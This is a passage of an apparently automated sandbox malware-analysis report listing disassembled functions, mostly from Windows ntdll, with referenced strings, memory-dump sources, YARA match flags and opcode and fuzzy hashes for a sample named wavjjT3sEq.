                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019A2104
                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 019A20F3
                                                                                                                                                              • LdrpInitializationFailure, xrefs: 019A20FA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                              • Opcode ID: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                                                                                              • Instruction ID: 6d07553d4e613c9963d3aa9a5f522c743e29a4fa56754e7a2a85af8c31de3886
                                                                                                                                                              • Opcode Fuzzy Hash: ade7e680f7dd783d27a1bf9eade95174d07319f6acafb2ac04ff83ae0f870abc
                                                                                                                                                              • Instruction Fuzzy Hash: C9F0C839640309AFEB25DB4CDC46F95376CFB81B54F500059FB0867281D5B0A645C691
                                                                                                                                                              Function 019303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: #%u
                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                              • Opcode ID: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                                                                                              • Instruction ID: dd6a4c1ad3527acde49485146fe393ec19dbacb0ee441c5108a20eaa78966dc8
                                                                                                                                                              • Opcode Fuzzy Hash: 7d41fef1d44f2a2f80d99cee5a12f6fa0382f982d50a8a8f0b006b8e496b763d
                                                                                                                                                              • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA9C994FAEB7F8BF98704F154065E909E7251EB34EE05CBA0
                                                                                                                                                              Function 019352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@
                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                              • Opcode ID: 27caedb08905a6ee56e9f12b5b4ca95779870b747047cb37669bf908a47d46e0
                                                                                                                                                              • Instruction ID: 2d703bc5d3d7cdee5fd67e47c40bfde1fcf0ff6015a716ccfbf054838d5f210a
                                                                                                                                                              • Opcode Fuzzy Hash: 27caedb08905a6ee56e9f12b5b4ca95779870b747047cb37669bf908a47d46e0
                                                                                                                                                              • Instruction Fuzzy Hash: 4432A0745083528BE725DF18C480B3EBBE9EFC8745F16491EFA8A9B290E734D940DB52
                                                                                                                                                              Function 0192A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • LdrResSearchResource Exit, xrefs: 0192AA25
                                                                                                                                                              • LdrResSearchResource Enter, xrefs: 0192AA13
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                              • API String ID: 0-4066393604
                                                                                                                                                              • Opcode ID: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                                                                                              • Instruction ID: 625c2be09e23d8667ad361f54b224448d27a8d54bf492b5dbe96adbbc0adfeae
                                                                                                                                                              • Opcode Fuzzy Hash: 9fe212cf137b0397c46bd9e4c6157d4359b31c7065f5ecf362ceeb080015c12b
                                                                                                                                                              • Instruction Fuzzy Hash: 7DE19272E002299FEF22DF99CA80BAEBBBAFF54710F104425E909E7655D734D941CB50
                                                                                                                                                              Function 01922FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @4Qw@4Qw$PATH
                                                                                                                                                              • API String ID: 0-1814558670
                                                                                                                                                              • Opcode ID: 4f612bc8611b88b3d1fada1947d391403f5cb5d0c3dad42813f800a87bc2c462
                                                                                                                                                              • Instruction ID: 60f6d81b9b2982494d1f0c83fc09ac74285a455dd9152a445d1418973baaca55
                                                                                                                                                              • Opcode Fuzzy Hash: 4f612bc8611b88b3d1fada1947d391403f5cb5d0c3dad42813f800a87bc2c462
                                                                                                                                                              • Instruction Fuzzy Hash: A4F1E375E00229DBCB25CF99D880ABEBBB5FF8C700F544429E549EB348D7789A41CB61
                                                                                                                                                              Function 019EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: `$`
                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                              • Instruction ID: 95b8d3e0fed9d10f309e2ce79bbcf3fae4dbd5ee6824c8c29748937fced3be7a
                                                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                              • Instruction Fuzzy Hash: FEC1D4312043429BE726CF28C849B6BBBE5BFD4715F044A2CF699C72A0D775D505CB51
                                                                                                                                                              Function 01920CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to retrieve service checksum., xrefs: 0197EE56
                                                                                                                                                              • ResIdCount less than 2., xrefs: 0197EEC9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                              • API String ID: 0-863616075
                                                                                                                                                              • Opcode ID: 5c66a3871d4ed4f969b7b2216c6511e46f0c9b609fd27336488717554a61cc6d
                                                                                                                                                              • Instruction ID: 8ed9902d8b677e43896355e69dc2060167304b57c18cc00d8872f9b21e2b477a
                                                                                                                                                              • Opcode Fuzzy Hash: 5c66a3871d4ed4f969b7b2216c6511e46f0c9b609fd27336488717554a61cc6d
                                                                                                                                                              • Instruction Fuzzy Hash: A3E1D0B19087849FE325CF15C040BABFBE4BF88715F408A2EE59D9A380D7719949CF96
                                                                                                                                                              Function 0199E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                                                              • Opcode ID: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                                                                                              • Instruction ID: 77c2d5129a747505b22a82fda7b6f32c3633efebcbf57f150ee8cb5e7f69213a
                                                                                                                                                              • Opcode Fuzzy Hash: 885a2d9942a80393cf949fbe5692d74c6b0f562763a23084e84c5cd6ba4b9693
                                                                                                                                                              • Instruction Fuzzy Hash: 7F613971E00619AFDB25DFADC840BAEBBB9FB48700F14446EE64DEB291D731A940CB51
                                                                                                                                                              Function 019C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$MUI
                                                                                                                                                              • API String ID: 0-17815947
                                                                                                                                                              • Opcode ID: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                                                                                              • Instruction ID: c52b431c881809feb5c3de980efe0c1d890872e5a128f57bf9f427a6a58520be
                                                                                                                                                              • Opcode Fuzzy Hash: a900d20ba27c2739d93f74947f3bae246cd3eab2b7ea6cb61134c79de1201fa7
                                                                                                                                                              • Instruction Fuzzy Hash: 25512A71E0025DAFDF11DFA9CC90AEEBBBCEB54B54F100529E659B7290D6309A05CB60
                                                                                                                                                              Function 019204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • kLsE, xrefs: 01920540
                                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0192063D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                              • API String ID: 0-2547482624
                                                                                                                                                              • Opcode ID: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                                                                                              • Instruction ID: adc785d93e27dcecbb3f29497f0313a80edda3e56f0546bb6f69844dff96a693
                                                                                                                                                              • Opcode Fuzzy Hash: a4640bb3e06619c6041b9c4c9a18b4c0b19fa156b692cfef311cb2e67aa642b8
                                                                                                                                                              • Instruction Fuzzy Hash: 2951DE715007528FD734EF29C444AA7BBE8AF84305F18493EFAAE87245E770D545CB92
                                                                                                                                                              Function 0192A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0192A2FB
                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0192A309
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                              • Opcode ID: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                                                                                              • Instruction ID: 04712ed76aba5f8611d0328dd27062e4204f33a779835a2f9aa5e3d9b85ccaa6
                                                                                                                                                              • Opcode Fuzzy Hash: 9638e24e5d7ea4842564c4c7b14d9e819e6e5126b47cfac51929df90a6965061
                                                                                                                                                              • Instruction Fuzzy Hash: 1541FF32A05269CFDB21DF59C840B6E7BF8FF85700F1440A9E908DB696E3B5CA00CB80
                                                                                                                                                              Function 0195A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                                                              • Opcode ID: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                                                                                              • Instruction ID: 9c4ff670e6a8a8c4b8b226f8a5437de4f094501f53fe0d1c1cfe161fe72dac9a
                                                                                                                                                              • Opcode Fuzzy Hash: 2050ff5e24176b10d87ce1048a8da597b2de9852c5e7a5e9d1056597e752e697
                                                                                                                                                              • Instruction Fuzzy Hash: 6B01F4B2241704AFD351DF24DD85F1677E8E794715F018A3DAA5CC7190E374D904CB5A
                                                                                                                                                              Function 0192C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: MUI
                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                              • Opcode ID: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                                                                                              • Instruction ID: eb4aebad443ed107e35d44cd7009134624fe410d4df3d371897ca6437bbb3a7c
                                                                                                                                                              • Opcode Fuzzy Hash: 8233b4d3a1ba50283db10fd1f23716aeecab244e3c332c155d949e51d7303b5a
                                                                                                                                                              • Instruction Fuzzy Hash: 09825B75E002298FEB25CFA9C880BEDBBB5BF49710F148169E91DAB399D7309D41CB50
                                                                                                                                                              Function 01972F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: P`?wRb?w
                                                                                                                                                              • API String ID: 0-3112501033
                                                                                                                                                              • Opcode ID: a71acab4ca31657a679e366e8ea4db9a62c7b9c0aef1526e87cb89655b57e7ad
                                                                                                                                                              • Instruction ID: a42c66468f10f7291fcbdc9943afb289fb1bd0bf44e6fffccd56a3c0525e5546
                                                                                                                                                              • Opcode Fuzzy Hash: a71acab4ca31657a679e366e8ea4db9a62c7b9c0aef1526e87cb89655b57e7ad
                                                                                                                                                              • Instruction Fuzzy Hash: B142F371D0425AAEEF29CFACD845AFDBBB9BF05311F14805AE54DAB280D7348B81E750
                                                                                                                                                              Function 019CCD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                              • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                                                                              • Instruction ID: 392a7a9a635262c8156b6d39e8654ccc1c8da4af5adbd2324a911e2670e5d17f
                                                                                                                                                              • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                                                                              • Instruction Fuzzy Hash: 5F622870D012188FCB98DF9AC4D4AADB7B2FF8C311F608199E9856BB45C7356A16CF60
                                                                                                                                                              Function 01942E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0
                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                              • Opcode ID: d2a9596d0969c4e0216b22e9f6a6ea78cfd02d39f2f5cdccb9405218464584f0
                                                                                                                                                              • Instruction ID: d89011afa7e5ce54b1fc5dad6e7fe99c24579f0b8681f3e9100b585e6c3246ae
                                                                                                                                                              • Opcode Fuzzy Hash: d2a9596d0969c4e0216b22e9f6a6ea78cfd02d39f2f5cdccb9405218464584f0
                                                                                                                                                              • Instruction Fuzzy Hash: 96F19D71608356DFDB26CF28C480E6ABBE5BFC8710F14896DE99D87241DB30DA45CB52
                                                                                                                                                              Function 001369D3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                              • Instruction ID: 450bb2fd7f41402126eadaee62785c295ebf7e9304db760215903d6c6e8c4418
                                                                                                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                              • Instruction Fuzzy Hash: 6F020DB6E006199BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D7746A418F80
                                                                                                                                                              Function 001369CE Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                              • Opcode ID: dcbd29e7781f19251de793ac5df530fce6af69b7e9e2ab216d509a1f4b832cfb
                                                                                                                                                              • Instruction ID: 84a229893ef7e31ece3f259e1287d5f4bbb7bbf90ceb8051fec04de69dc321c4
                                                                                                                                                              • Opcode Fuzzy Hash: dcbd29e7781f19251de793ac5df530fce6af69b7e9e2ab216d509a1f4b832cfb
                                                                                                                                                              • Instruction Fuzzy Hash: E1020CB6E006199BDB14CF9AC88059DFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                                                              Function 019AEFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __aullrem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3758378126-0
                                                                                                                                                              • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                                                                              • Instruction ID: eb092a7c5abe972b38180b5aba91243c3d5a27c39f81f2e8e22cf1373280944f
                                                                                                                                                              • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                                                                              • Instruction Fuzzy Hash: D0418E71F0012A9FDF18DFB9C8805AEF7F6FF88314B188639E619E7280D634A9558780
                                                                                                                                                              Function 01920100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: 45f8b3a879de69f1858d25f9ed02692f68f1190700daa2629006a54545411e4d
                                                                                                                                                              • Instruction ID: 73998ad33450d0320869072e807fd78c56a787c7549db8a5e9e58e782ea671c3
                                                                                                                                                              • Opcode Fuzzy Hash: 45f8b3a879de69f1858d25f9ed02692f68f1190700daa2629006a54545411e4d
                                                                                                                                                              • Instruction Fuzzy Hash: B5A14D31A042796BDF29CA298841BFE6FAD5F95304F0C44D9FE8E67286D670CD84CB60
                                                                                                                                                              Function 019D4420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: fd70de49ffd73ceeb80e1bfd6ca902d796ee0cea319b7ed8987a94b504024df4
                                                                                                                                                              • Instruction ID: 5f641e8389a34ed80ec8d152c0f69522ccd436a34e4cd69da264a74b8ec0b235
                                                                                                                                                              • Opcode Fuzzy Hash: fd70de49ffd73ceeb80e1bfd6ca902d796ee0cea319b7ed8987a94b504024df4
                                                                                                                                                              • Instruction Fuzzy Hash: 08A138346003686ADF35CE68CC40BF92BA89F96755F48C498BE4E5BAC1D774C990CB60
                                                                                                                                                              Function 019A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: 834c42152400c5cea01907e1181fe2b5e6029534d9de0c8e3f615323aa8dd052
                                                                                                                                                              • Instruction ID: 67d52604c7c9f006f33d198fa91b9cc4b304e115943ec3738d41b8cb81b55dce
                                                                                                                                                              • Opcode Fuzzy Hash: 834c42152400c5cea01907e1181fe2b5e6029534d9de0c8e3f615323aa8dd052
                                                                                                                                                              • Instruction Fuzzy Hash: BF919471940219AFEB21DF95CD85FAEBBB8EF58B50F540065F608AB190D774ED04CBA0
                                                                                                                                                              Function 001225A0 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: gfff
                                                                                                                                                              • API String ID: 0-1553575800
                                                                                                                                                              • Opcode ID: 9772cd1e22549f5b0b301e0a408c00906b3aaf2d88b2d3b6b2439efade65d6cc
                                                                                                                                                              • Instruction ID: 327328d758e2d3b650c0cad6bc70ba55fc02284db447da716e229a8fb7a0cf89
                                                                                                                                                              • Opcode Fuzzy Hash: 9772cd1e22549f5b0b301e0a408c00906b3aaf2d88b2d3b6b2439efade65d6cc
                                                                                                                                                              • Instruction Fuzzy Hash: EE71D372F0012557DF2C8D1DEC9066D7292EBE4315F18813AED19CF385EA34ED218780
                                                                                                                                                              Function 019CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                              • Opcode ID: 8f70c96ef3dce7306b6b242a65c1c9aac67fa436b866617c58b19c60b8cf6f37
                                                                                                                                                              • Instruction ID: 58fc892b426e54c3bc8ac97c2adc3d9be1aeb139b821dbd7f9cdbc04e6018cbc
                                                                                                                                                              • Opcode Fuzzy Hash: 8f70c96ef3dce7306b6b242a65c1c9aac67fa436b866617c58b19c60b8cf6f37
                                                                                                                                                              • Instruction Fuzzy Hash: C4917032901609AFDB22EBA5DC44FAFBF7EEF85B50F100019F54AA7250D774A901CB52
                                                                                                                                                              Function 001228F0 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
